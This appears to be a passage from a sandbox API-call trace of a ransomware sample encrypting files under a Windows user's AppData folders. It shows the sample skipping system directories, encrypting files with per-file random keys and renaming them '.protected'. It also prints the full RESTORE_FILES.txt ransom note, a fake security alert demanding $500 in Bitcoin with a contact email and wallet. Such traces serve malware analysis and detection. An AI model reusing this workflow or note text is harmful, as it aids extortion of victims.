[0085.257] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.257] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.257] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.257] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.263] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.263] CloseHandle (hObject=0x14c) returned 1 [0085.263] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat.protected") returned 87 [0085.263] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat.protected")) returned 1 [0085.264] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.264] lstrcmpiW (lpString1="thumbs.dat", lpString2="Windows") returned -1 [0085.264] lstrcmpiW (lpString1="thumbs.dat", lpString2="Program 
Files") returned 1 [0085.264] lstrcmpiW (lpString1="thumbs.dat", lpString2="Program Files (x86)") returned 1 [0085.264] lstrcmpiW (lpString1="thumbs.dat", lpString2="$Recycle.bin") returned 1 [0085.264] lstrcmpiW (lpString1="thumbs.dat", lpString2="System Volume Information") returned 1 [0085.265] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat") returned 74 [0085.265] StrStrIW (lpFirst="thumbs.dat", lpSrch=".protected") returned 0x0 [0085.265] lstrcmpW (lpString1="thumbs.dat", lpString2="RESTORE_FILES.txt") returned 1 [0085.265] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.265] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat") returned 74 [0085.265] StrStrW (lpFirst="thumbs.dat", lpSrch=".txt") returned 0x0 [0085.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat") returned 74 [0085.265] StrStrW (lpFirst="thumbs.dat", lpSrch=".rar") returned 0x0 [0085.266] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat") returned 74 [0085.266] StrStrW (lpFirst="thumbs.dat", lpSrch=".zip") returned 0x0 [0085.266] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.271] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.272] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.272] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.272] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.273] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.273] CloseHandle (hObject=0x14c) returned 1 [0085.273] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat.protected") returned 84 [0085.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat.protected")) returned 1 [0085.274] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) 
returned 0 [0085.274] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.274] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\RESTORE_FILES.txt") returned 81 [0085.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.290] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.290] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.291] lstrlenA (lpString="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") returned 684 [0085.291] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.291] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.291] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0085.291] CloseHandle (hObject=0xd8) returned 1 [0085.292] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.292] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0085.292] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.292] lstrcmpiW (lpString1="Windows Mail", lpString2="Windows") returned 1 [0085.292] lstrcmpiW (lpString1="Windows Mail", lpString2="Program Files") returned 1 [0085.292] lstrcmpiW (lpString1="Windows Mail", lpString2="Program Files (x86)") returned 1 [0085.292] lstrcmpiW (lpString1="Windows Mail", lpString2="$Recycle.bin") returned 1 [0085.292] lstrcmpiW (lpString1="Windows Mail", lpString2="System Volume Information") returned 1 [0085.292] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail") returned 70 [0085.292] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0085.292] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0085.292] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\*") returned 72 [0085.292] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.294] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.294] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.294] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.294] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.294] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.294] wnsprintfW (in: pszDest=0x504c48, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\.") returned 72 [0085.294] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.294] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.294] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.295] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.295] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.295] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.295] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.295] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\..") returned 73 [0085.295] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.295] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.295] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.295] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="Windows") returned -1 [0085.295] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="Program Files") returned -1 [0085.295] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="Program Files (x86)") returned -1 [0085.295] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="$Recycle.bin") returned 1 [0085.295] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="System Volume Information") returned -1 [0085.295] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows 
Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 126 [0085.295] StrStrIW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".protected") returned 0x0 [0085.295] lstrcmpW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="RESTORE_FILES.txt") returned -1 [0085.295] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.295] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.296] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 126 [0085.296] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".txt") returned 0x0 [0085.296] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 126 [0085.296] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".rar") returned 0x0 [0085.296] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 126 [0085.296] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", 
lpSrch=".zip") returned 0x0 [0085.296] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x5e4, lpOverlapped=0x0) returned 1 [0085.297] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffa1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.297] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x5e4, lpOverlapped=0x0) returned 1 [0085.297] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.298] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.298] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.298] CloseHandle (hObject=0x14c) returned 1 [0085.298] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.protected") returned 136 [0085.298] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows 
Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.protected")) returned 1 [0085.299] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.299] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="Windows") returned -1 [0085.299] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="Program Files") returned -1 [0085.299] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="Program Files (x86)") returned -1 [0085.299] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="$Recycle.bin") returned 1 [0085.299] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="System Volume Information") returned -1 [0085.299] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 126 [0085.299] StrStrIW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".protected") returned 0x0 [0085.299] lstrcmpW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="RESTORE_FILES.txt") returned -1 [0085.299] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.299] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows 
Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.300] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 126 [0085.300] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".txt") returned 0x0 [0085.300] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 126 [0085.300] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".rar") returned 0x0 [0085.300] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 126 [0085.300] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".zip") returned 0x0 [0085.300] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2a0, lpOverlapped=0x0) returned 1 [0085.301] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffd60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.301] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2a0, lpOverlapped=0x0) returned 1 [0085.302] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.302] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.302] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.302] CloseHandle (hObject=0x14c) returned 1 [0085.302] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.protected") returned 136 [0085.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.protected")) returned 1 [0085.303] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.303] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="Windows") returned -1 [0085.303] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="Program Files") returned -1 [0085.303] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="Program Files (x86)") returned -1 
[0085.303] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="$Recycle.bin") returned 1 [0085.303] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="System Volume Information") returned -1 [0085.303] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 126 [0085.303] StrStrIW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".protected") returned 0x0 [0085.303] lstrcmpW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="RESTORE_FILES.txt") returned -1 [0085.303] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.303] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 126 [0085.304] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".txt") returned 0x0 [0085.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows 
